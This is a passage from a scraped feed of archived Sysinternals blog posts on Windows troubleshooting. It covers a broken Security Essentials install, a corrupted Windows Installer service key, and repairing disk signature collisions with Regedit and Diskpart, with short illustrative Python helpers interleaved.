src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121391iEA5511F75D016459" style="background-image: none; border-bottom: 0px; border-left: 0px; padding-left: 0px; padding-right: 0px; display: inline; border-top: 0px; border-right: 0px; padding-top: 0px" title="image" width="554" /> </P> <P> However, the messages in them revealed nothing more than the cryptic error message shown in the dialog. 
</P> <P> After a few minutes I decided I should work my way back from the point in the trace where the error occurred, so I returned to the tree, selected Wermgr.exe, and clicked “Go to event”: </P> <P> <IMG alt="image" border="0" height="99" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/7827.image_5F00_thumb_5F00_0ECDE20D.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121392iB9FD8A9282989503" style="background-image: none; border-bottom: 0px; border-left: 0px; padding-left: 0px; padding-right: 0px; display: inline; border-top: 0px; border-right: 0px; padding-top: 0px" title="image" width="554" /> </P> <P> This would ideally be just after the setup encountered the fatal condition. Then I paged up in the trace, looking for clues. After several more minutes I noticed a pattern that accounted for almost all the operations up to that point: Setup.exe was enumerating all the system’s installed applications. I determined that by observing that it queried multiple installer-related registry locations, and I could see the names of the applications it found in the Details column for some of them. Here, for example, is one of the OEM’s programs, another help file-as-an-application, that I hadn’t bothered to uninstall: </P> <P> <IMG alt="image" border="0" height="119" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/1122.image_5F00_thumb_5F00_19.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121393i4E569CA18B4ED25C" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="554" /> </P> <P> I could now move quickly through the trace by scanning for application names. 
A minute later I stopped short, spotting something I shouldn’t have seen: “Microsoft Security Essentials”: </P> <P> <IMG alt="image" border="0" height="54" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/3386.image_5F00_thumb_5F00_21.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121394i871EAD32D42EB767" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="554" /> </P> <P> I knew I hadn’t seen it listed in the installed programs list in the Control Panel in my earlier uninstall-fest, which I confirmed by rechecking. </P> <P> Why were there traces of MSE when it hadn’t been installed, and in fact wouldn’t install? I don’t know for sure, but after pondering this for a few minutes I came to the conclusion that the software my mother had used to transfer files and settings from her old system had copied parts of the MSE installation she had on the old PC. She likely had used whatever utility the OEM put on the PC, but I would recommend using <A href="#" target="_blank"> Windows Easy Transfer </A> . But the reason didn’t really matter at this point; what mattered was getting MSE to install successfully, and I believed I had found the problem. I deleted the keys, reran the setup, and… hit the same error. </P> <P> Not ready to give up, I captured another trace. Suspecting that setup was tripping on other fragments of the phantom installation, I searched for “security essentials” in the new trace and found another reference before the setup bailed. To avoid repeating this step many more times, I went to the registry and performed the same search, deleting about two dozen other keys that had “security essentials” somewhere in them. 
</P> <P> I held my breath and ran the installer again, but no go: </P> <P> <IMG alt="image" border="0" height="282" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/8407.image_5F00_thumb_5F00_16.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121395i66DAED7BAC7F3EF6" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="454" /> </P> <P> The error code was different so I had apparently made some progress, but a web search still didn’t yield any clues. I captured yet another trace and began poring over the operations. The install made its way past the installed application enumeration, generating tens of thousands more operations. I scanned back from where Wermgr.exe launched, but was quickly overwhelmed. I just couldn’t spot what had made it unhappy, and that was assuming that whatever it was would be visible in the trace. My brother-in-law was growing skeptical, but I told him I wasn’t done. I was motivated by the challenge as much as the fact that I couldn’t let him tell his work buddies that he’d watched me fail. </P> <P> I decided I needed the guidance of a successful installation’s trace so that I could find where things went astray. When it’s an option, like it was here, side-by-side trace comparison is a powerful troubleshooting technique. I switched to my laptop, launched a Windows 7 virtual machine, and generated a trace of MSE’s successful installation on a clean system. I then copied the log from my mom’s computer and opened both traces in separate windows, one on the top of the screen and one on the bottom. </P> <P> Scrolling through the traces in tandem, I was able to synchronize them simply by looking at the shapes that the operation paths make in the window and occasionally ensuring that they were indeed in sync by looking closely at a few operations. 
Though it was laborious, I progressed through the trace, at times losing sync but then gaining it back. One trace being from a clean system and the other with lots of software installed caused relatively minor differences I could discount. </P> <P> Finally after about 10 minutes, I found an operation that differed in what seemed to be a significant way: an open of the registry key HKCR\Installer\UpgradeCodes\11BB99F8B7FD53D4398442FBBAEF050F returned SUCCESS in the failing trace: </P> <P> <IMG alt="image" border="0" height="64" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/7506.image_5F00_thumb_5F00_11.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121396iE553484C5AF3B99B" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="554" /> </P> <P> but NAME NOT FOUND in the working one: </P> <P> <IMG alt="image" border="0" height="70" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/5342.image_5F00_thumb_5F00_10.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121397i403EDE8B70EB3D53" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="554" /> </P> <P> Another bit of the broken installation it seemed, but without any reference to MSE, so one that hadn’t shown up in my registry search. I deleted the key, and with some forced confidence told my brother-in-law that I had solved the problem. Then I crossed my fingers and launched the setup again, praying that it would work and I could get back to the holiday festivities that were in full swing downstairs. 
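</P> <P> A side note on that key name: the 32-character string under UpgradeCodes appears to be the “packed” form in which Windows Installer stores GUIDs in the registry, which would explain why a text search for the product name never lands on it. The sketch below converts a packed name to the familiar braced form. The function name is hypothetical, and the reordering rule is the commonly described one rather than anything read from the trace. </P>

```python
def unpack_msi_guid(packed):
    """Convert a 32-hex-digit packed Installer GUID to the braced form.

    Illustrative helper, not a Windows API; assumes the commonly
    described packed-GUID ordering used under HKCR\\Installer.
    """
    if len(packed) != 32:
        raise ValueError("expected 32 hex digits")
    # The first three GUID fields are stored with their characters reversed.
    part1 = packed[0:8][::-1]
    part2 = packed[8:12][::-1]
    part3 = packed[12:16][::-1]
    # The remaining eight bytes are stored with each byte's two digits swapped.
    rest = "".join(packed[i + 1] + packed[i] for i in range(16, 32, 2))
    return "{%s-%s-%s-%s-%s}" % (part1, part2, part3, rest[:4], rest[4:])


print(unpack_msi_guid("11BB99F8B7FD53D4398442FBBAEF050F"))
```

<P> Searching the registry for both the packed and the braced form is one way to sweep up Installer entries that never mention the product by name. 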
</P> <P> Bingo, the setup chugged along for a few seconds and finished by congratulating me on my successful install: </P> <P> <IMG alt="SNAGHTMLfe4b7cd" border="0" height="282" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/4265.SNAGHTMLfe4b7cd_5F00_thumb.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121398iACEBC7C8D7F49255" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="SNAGHTMLfe4b7cd" width="454" /> </P> <P> Another seemingly unsolvable problem conquered with Sysinternals, application of a few useful troubleshooting techniques, and some perseverance. My brother-in-law was suitably impressed and had a good story for when he returned to the office after the break, and my mother had a faster PC with free antimalware service. </P> <P> I followed up with the MSE team and they are working on improving the error codes and making the setup program more robust against these kinds of issues. They also pointed me at some additional resources in case you happen to run into the same kind of problem. First, there’s a Microsoft support tool, <A href="#" target="_blank"> MscSupportTool.exe </A> , that extracts the MSE installation log files, which might give some additional information. There’s also a <A href="#" target="_blank"> Microsoft ‘fix-it tool’ </A> that addresses some installation corruption problems. </P> <P> I hope that your holiday troubleshooting met with similar success and wish that your 2012 is free of computer problems! 
</P> </BODY></HTML> Thu, 27 Jun 2019 07:24:32 GMT https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/the-case-of-my-mom-8217-s-broken-microsoft-security-essentials/ba-p/724196 MarkRussinovich 2019-06-27T07:24:32Z The Case of the Installer Service Error https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/the-case-of-the-installer-service-error/ba-p/724144 <HTML> <HEAD></HEAD><BODY> <STRONG> First published on TechNet on Nov 27, 2011 </STRONG> <BR /> <P> This case unfolds with a network administrator charged with the rollout of the <A href="#" target="_blank"> Microsoft Windows Intune </A> client software on their network. Windows Intune is a cloud service that manages systems on a corporate network, keeping their software up to date and enabling administrators to monitor the health of those systems from a browser interface. It requires a client-side agent, but on one particular system the client software failed to install, reporting this error message: </P> <P> <IMG alt="image" border="0" height="172" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/6278.image_5F00_thumb.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121380iAE67656B92A1CD35" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="284" /> </P> <P> The dialog’s error message translates to “The Windows Installer Service could not be accessed. This can occur if the Windows Installer is not correctly installed. Contact your support personnel for assistance.” </P> <P> The administrator, having seen one of my <A href="#" target="_blank"> Case of the Unexplained presentations </A> where I advised, “when in doubt, run Process Monitor,” downloaded <A href="#" target="_blank"> a copy from Sysinternals.com </A> and captured a trace of the failed install. 
He followed the standard troubleshooting technique of looking backward from the end of the trace for operations that might be the cause, but after about a half hour of analysis he gave up and switched to a different approach. Instead of looking for clues in the trace, he thought he might be able to find clues by comparing the trace of the failing system to another captured on a system where the client installed successfully. </P> <P> A few minutes later he had a second trace to compare side-by-side. He set a filter to include only events generated by Msiexec.exe, the client setup program, and proceeded through the events in the trace from the problematic system, correlating them with corresponding events on the working one. He eventually got to a point where the two traces diverged. Both traces have references to HKLM\System\CurrentControlSet\Services\BFE, but the failed trace then has registry queries of the ComputerName registry key: </P> <P> <IMG alt="image" border="0" height="100" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/7183.image_5F00_thumb_5F00_1.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121381iD94F1B3B66D45FAB" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="554" /> </P> <P> The working system’s trace, on the other hand, continues with operations from a new instance of Msiexec.exe, something he noticed because the process ID of the subsequent Msiexec.exe operations was different from that of the earlier ones: </P> <P> <IMG alt="image" border="0" height="93" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/1488.image_5F00_thumb_5F00_5.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121382i4EF38C1961A88BA3" style="border-right-width: 0px; 
display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="554" /> </P> <P> It still wasn’t clear from the failed trace what caused the divergence, however. After pondering the situation for a few minutes he was just about to give up when the thought crossed his mind that the answer might lie in the operations that the filter was hiding. He deleted the filter he’d applied that included only events from Msiexec.exe from both traces and resumed comparing traces from the point of divergence. </P> <P> He immediately saw that the trace from the working system had many events from a Svchost.exe process that weren’t present in the failed trace. Working under the assumption that the Svchost.exe activity was unrelated, he added a filter to exclude it. Now the traces lined up again with events from Services.exe matching in both traces: </P> <P> <IMG alt="image" border="0" height="105" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/0334.image_5F00_thumb_5F00_4.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121383i5785D29A7563D51F" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="554" /> <IMG alt="image" border="0" height="112" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/4456.image_5F00_thumb_5F00_3.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121384i8BDB5B31CB28BF0E" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="554" /> </P> <P> The matching operations didn’t go on for very long, however. 
Only a dozen or so operations later the trace from the failing system had a reference to HKLM\System\CurrentControlSet\Services\Msiserver\ObjectName with a NAME NOT FOUND error: </P> <P> <IMG alt="image" border="0" height="86" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/6278.image_5F00_thumb_5F00_6.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121385iBF3EE66A55823F17" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="554" /> </P> <P> The trace from the working system had the same operation, but with a SUCCESS result: </P> <P> <IMG alt="image" border="0" height="107" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/1401.image_5F00_thumb_5F00_7.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121386i43EF0DFDBA726B20" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="554" /> </P> <P> Sure enough, right-clicking on the path and selecting “Jump to…” from Process Monitor’s context menu confirmed that not only was the ObjectName value missing from the failing system’s Msiserver key, but the entire key was empty. 
On the working system it was populated with the registry values required to configure a Windows service: </P> <P> <IMG alt="image" border="0" height="104" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/8345.image_5F00_thumb_5F00_9.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121388i6ACC41FBB8D012C5" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="432" /> </P> <P> Somehow the service registration for the MSI service had been corrupted, something the initial error dialog had stated but without guidance for how to fix the problem. And how the service had been corrupted would likely remain forever a mystery, but the important thing now was fixing it. To do so, he simply used Regedit’s export functionality to save the contents of the key from the working system to a .reg file and then imported the file to the corrupted system. After the import, he reran the Microsoft Intune installer and it succeeded without any issues. </P> <P> With the help of Process Monitor and some diligence, he’d spent about forty-five minutes fixing a problem that would have ended up costing him several hours if he’d had to reimage the system and restore its applications and configuration. </P> <P> You can find more tips on running Process Monitor, as well as additional illustrative troubleshooting cases, in my <A href="#" target="_blank"> Windows Sysinternals Administrator’s Reference </A> , a book I recently published with <A href="#" target="_blank"> Aaron Margosis </A> . If you’ve read it, please leave a review on <A href="#" target="_blank"> Amazon.com </A> . 
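</P> <P> The side-by-side comparison at the heart of this case can also be roughed out in code. This is only a sketch under stated assumptions: it assumes both traces were exported from Process Monitor as CSV with “Process Name”, “Operation”, “Path” and “Result” columns, the helper names are made up, and the two sample rows are invented for illustration, loosely shaped after the Msiserver operations described above. </P>

```python
import csv
import difflib
import io


def load_events(csv_text):
    """Reduce a CSV trace export to comparable (process, op, path, result) tuples."""
    reader = csv.DictReader(io.StringIO(csv_text))
    # Timestamps and PIDs always differ between machines, so they are left out.
    return [(r["Process Name"], r["Operation"], r["Path"], r["Result"]) for r in reader]


def first_divergence(failing, working):
    """Return the first non-matching block as (tag, failing_events, working_events)."""
    matcher = difflib.SequenceMatcher(a=failing, b=working, autojunk=False)
    for tag, i1, i2, j1, j2 in matcher.get_opcodes():
        if tag != "equal":
            return tag, failing[i1:i2], working[j1:j2]
    return None


# Invented sample rows; a real export would hold tens of thousands of events.
HEADER = '"Process Name","Operation","Path","Result"\n'
KEY = "HKLM\\System\\CurrentControlSet\\Services\\Msiserver"
OPEN_ROW = '"services.exe","RegOpenKey","%s","SUCCESS"\n' % KEY
QUERY_ROW = '"services.exe","RegQueryValue","%s\\ObjectName","%s"\n'
failing_csv = HEADER + OPEN_ROW + QUERY_ROW % (KEY, "NAME NOT FOUND")
working_csv = HEADER + OPEN_ROW + QUERY_ROW % (KEY, "SUCCESS")

result = first_divergence(load_events(failing_csv), load_events(working_csv))
print(result)
```

<P> A diff like this will also flag the harmless differences between any two machines, so it narrows the search rather than replacing the judgment about which divergence matters. 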
</P> </BODY></HTML> Thu, 27 Jun 2019 07:23:17 GMT https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/the-case-of-the-installer-service-error/ba-p/724144 MarkRussinovich 2019-06-27T07:23:17Z Fixing Disk Signature Collisions https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/fixing-disk-signature-collisions/ba-p/724114 <HTML> <HEAD></HEAD><BODY> <STRONG> First published on TechNet on Nov 06, 2011 </STRONG> <BR /> <P> Disk cloning has become common as IT professionals virtualize physical servers using tools like <A href="#" target="_blank"> Sysinternals Disk2vhd </A> and use a master virtual hard disk image as the base for copies created for virtual machine clones. In most cases, you can operate with cloned disk images unaware that they have duplicate disk signatures. However, on the off chance you attach a cloned disk to a Windows system that has a disk with the same signature, you will suffer the consequences of disk signature collision, which renders unbootable any of the disk’s installations of Windows Vista and newer. Reasons for attaching a disk include offline injection of files, offline malware scanning, and - somewhat ironically - repairing a system that won’t boot. This risk of corruption is the reason that I warn in Disk2vhd’s documentation not to attach a VHD produced by Disk2vhd to the system that generated the VHD using the native VHD support added in Windows 7 and Windows Server 2008 R2. </P> <P> I’ve gotten emails from people that have run into the disk signature collision problem and see from a Web search that there’s little clear help for fixing it. So in this post, I’ll give you easy repair steps you can follow if you’ve got a system that won’t boot because of a disk signature collision. I’ll also explain where disk signatures are stored, how Windows uses them, and why a collision makes a Windows installation unbootable. 
</P> <H3> Disk Signatures </H3> <P> A disk signature is a four-byte identifier at <A href="#" target="_blank"> offset 0x1B8 in a disk’s Master Boot Record </A> , which is written to the first sector of a disk. This screenshot of a disk editor shows that the signature of my development system’s disk is 0xE9EB3AA5 (the value is stored in little-endian format, so the bytes are stored in reverse order): </P> <P> <IMG alt="image" border="0" height="146" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/6765.image_5F00_thumb_5F00_163542B1.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121369i15EC4D8C310E17F2" style="background-image: none; border-right-width: 0px; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="image" width="554" /> </P> <P> Windows uses disk signatures internally to map objects like volumes to their underlying disks, and starting with Windows Vista, Windows uses disk signatures in its Boot Configuration Database (BCD), which is where it stores the information the boot process uses to find boot files and settings. 
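</P> <P> To make the little-endian layout concrete, here is a minimal sketch that pulls the signature out of a first sector. It runs on a synthetic 512-byte buffer rather than a real disk, and the function and constant names are illustrative only; the offset and the example value are the ones given above. </P>

```python
import struct

MBR_SIGNATURE_OFFSET = 0x1B8  # offset of the disk signature within sector 0


def read_disk_signature(sector0):
    """Return the 32-bit disk signature from the first sector of an MBR disk."""
    if len(sector0) < 512:
        raise ValueError("need the full 512-byte first sector")
    # "<I" reads an unsigned 32-bit integer in little-endian byte order.
    (signature,) = struct.unpack_from("<I", sector0, MBR_SIGNATURE_OFFSET)
    return signature


# Synthetic sector for illustration: all zeros except the four signature
# bytes, laid out in the reversed order a disk editor would display.
sector = bytearray(512)
sector[0x1B8:0x1BC] = bytes([0xA5, 0x3A, 0xEB, 0xE9])

print(hex(read_disk_signature(sector)))
```

<P> On a real system the 512 bytes would come from the raw disk device or a flat disk image, which normally requires administrative rights; that part is deliberately left out of the sketch. </P> <P> 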
When you look at a BCD’s contents using the built-in Bcdedit utility, you can see the three places that reference the disk signature: </P> <P> <IMG alt="image" border="0" height="464" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/3731.image_5F00_thumb_5F00_21939A74.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121370iC8A5D5DFBF152B0D" style="background-image: none; border-right-width: 0px; margin: 0px; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="image" width="554" /> </P> <P> The BCD actually has additional references to the disk signature in alternate boot configurations, like the Windows Recovery Environment, resume from hibernate, and the Windows Memory Diagnostic boot, that don’t show up in the basic Bcdedit output. Fixing a collision requires knowing a little about the BCD structure, which is actually a registry hive file that Windows loads under HKEY_LOCAL_MACHINE\BCD00000000: </P> <P> <IMG alt="image" border="0" height="369" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/3324.image_5F00_thumb_5F00_3D38266A.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121371i090EE6F6E8092EAF" style="background-image: none; border-right-width: 0px; margin: 0px; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="image" width="331" /> </P> <P> Disk signatures show up at offset 0x38 in registry values called Element under keys named 0x11000001 ( <A href="#" target="_blank"> Windows boot device </A> ) and 0x21000001 ( <A href="#" target="_blank"> OS load device </A> ): </P> <P> <IMG alt="image" border="0" height="190" 
original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/2742.image_5F00_thumb_5F00_7D020CEF.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121372i83ABA5FD90BFB7D3" style="background-image: none; border-right-width: 0px; margin: 0px; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="image" width="489" /> </P> <P> Here’s the element corresponding to one of the entries seen in the Bcdedit output, where you can see the same disk signature that’s stored in my disk’s MBR: </P> <P> <IMG alt="image" border="0" height="244" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/0268.image_5F00_thumb_5F00_55C7C3BA.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121373iDA77F3EC0D6EE02A" style="background-image: none; border-right-width: 0px; margin: 0px; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="image" width="490" /> </P> <H3> Disk Signature Collisions </H3> <P> Windows requires the signatures to be unique, so when you attach a disk that has a signature equal to one already attached, Windows keeps the disk in “offline” mode and doesn’t read its partition table or mount its volumes. 
This screenshot shows how the Windows Disk Management administrative utility presents a disk that went offline when I attached the VHD that Disk2vhd created for my development system to that same system: </P> <P> <IMG alt="image" border="0" height="131" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/3125.image_5F00_thumb_5F00_55FF2936.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121374iEB8568F149D31B91" style="background-image: none; border-right-width: 0px; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="image" width="537" /> </P> <P> If you right-click on the disk, the utility offers an “Online” command that will cause Windows to analyze the disk’s partition table and mount its volumes: </P> <P> <IMG alt="image" border="0" height="138" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/0576.image_5F00_thumb_5F00_7CCD3F76.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121375i31D7558FD2E677BA" style="background-image: none; border-right-width: 0px; margin: 0px; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="image" width="238" /> </P> <P> When you choose the Online menu option, Windows will, without warning, generate a new random disk signature and assign it to the disk by writing it to the MBR. It will then be able to process the MBR and mount the volumes present, but when Windows updates the disk signature, the BCD entries become orphaned, linked with the previous disk signature, not the new one. 
The boot loader will fail to locate the specified disk and boot files when booting from the disk and give up, reporting the following error: </P> <P> <IMG alt="image" border="0" height="416" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/1565.image_5F00_thumb_5F00_3C9725FC.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121376i61D7BA41571114A3" style="background-image: none; border-right-width: 0px; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="image" width="554" /> </P> <H3> Restoring a Disk Signature </H3> <P> One way to repair a disk signature corruption is to determine the new disk signature Windows assigned to the disk, load the disk’s BCD hive, and manually edit all the registry values that store the old disk signature. That’s laborious and error-prone, however. In some cases, you can use Bcdedit commands to point the device elements at the new disk signature, but that method doesn’t work on attached VHDs and so is unreliable. Fortunately, there’s an easier way. Instead of updating the BCD, you can give the disk its original disk signature back. </P> <P> First, you have to determine the original signature, which is where knowing a little about the BCD becomes useful. Attach the disk you want to fix to a running Windows system. It will be online and Windows will assign drive letters to the volumes on the disk, since there’s no disk signature collision. 
Load the BCD off the disk by launching Regedit, selecting HKEY_LOCAL_MACHINE, and choosing Load Hive from the File menu: </P> <P> <IMG alt="image" border="0" height="244" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/6765.image_5F00_thumb_5F00_74D59D14.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121377iFAD90BB820103157" style="background-image: none; border-right-width: 0px; margin: 0px; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="image" width="269" /> </P> <P> Navigate to the disk’s hidden \Boot directory in the file dialog, which resides in the root directory of one of the disk’s volumes, and select the file named “BCD”. If the disk has multiple volumes, find the Boot directory by just entering x:\boot\bcd, replacing the “x:” with each of the volumes’ drive letters in turn. When you’ve found the BCD, pick a name for the key into which it loads, select that key, and search for “Windows Boot Manager”. You’ll find a match under a key named 12000004, like this: </P> <P> <IMG alt="image" border="0" height="127" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/6052.image_5F00_thumb_5F00_7816FEF1.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121378i714E0F7D6D420995" style="background-image: none; border-right-width: 0px; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="image" width="347" /> </P> <P> Select the key named 11000001 under the same Elements parent key and note the four-byte disk signature located at offset 0x38 (remember to reverse the order of the bytes). 
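</P> <P> The byte reversal is easy to get wrong by hand, so here is a minimal Python sketch of the step just described. It assumes you have exported or copied the Element value as raw bytes; the function name and the zero-padded sample value are made up for illustration, and only the 0x38 offset and the example signature come from this post. </P>

```python
SIGNATURE_OFFSET = 0x38   # offset of the disk signature inside the Element value
SIGNATURE_LENGTH = 4      # MBR disk signatures are four bytes long


def disk_signature_from_element(element):
    """Return the disk signature stored in an Element value as 8 hex digits."""
    raw = element[SIGNATURE_OFFSET:SIGNATURE_OFFSET + SIGNATURE_LENGTH]
    if len(raw) != SIGNATURE_LENGTH:
        raise ValueError("Element value is too short to hold a disk signature")
    # The bytes are stored least-significant first, so reading them as a
    # little-endian integer performs the byte reversal for us.
    return format(int.from_bytes(raw, "little"), "08x")


# Hypothetical Element value: zero padding up to offset 0x38, then the
# signature bytes in the order they appear in the registry editor.
sample_element = bytes(SIGNATURE_OFFSET) + bytes.fromhex("a53aebe9") + bytes(16)
print(disk_signature_from_element(sample_element))  # e9eb3aa5
```

<P> The printed value is in the form that the Diskpart uniqueid command expects. 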
</P> <P> With the disk signature in hand, open an administrative command prompt window and run Diskpart, the command-line disk management utility. Enter “select disk 2”, replacing “2” with the disk ID that the Disk Management utility shows for the disk. Now you’re ready for the final step, setting the disk signature to its original value with the command “uniqueid disk id=e9eb3aa5”, substituting the ID with the one you saw in the BCD: </P> <P> <IMG alt="image" border="0" height="45" original-url="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-52-36-metablogapi/6763.image_5F00_thumb_5F00_5B6D99DA.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121379iA4103FD4A40F8C80" style="background-image: none; border-right-width: 0px; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="image" width="349" /> </P> <P> When you execute this command, Windows will immediately force the disk and its corresponding volumes offline to avoid a signature collision. Avoid bringing the disk online again or you’ll undo your work. You can now detach the disk and because the disk signature matches the BCD again, Windows installations on the disk will boot successfully. You might find yourself in a situation where you have no choice but to cause a collision and have Windows update a disk signature, but at least now you know how to repair it when you do. </P> <P> You can find out more about Disk2vhd in the <A href="#" target="_blank"> Sysinternals Administrator’s Reference </A> by me and Aaron Margosis. 
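</P> <P> If you repair disks this way regularly, the two Diskpart commands used above can be collected into a script file. The following Python sketch only builds the script text; the function name is hypothetical, and the disk number and signature are the example values from this post, which you would replace with your own. </P>

```python
import re


def build_diskpart_script(disk_number, signature):
    """Return Diskpart script text that restores an MBR disk signature."""
    if not str(disk_number).isdigit():
        raise ValueError("disk number must be a non-negative integer")
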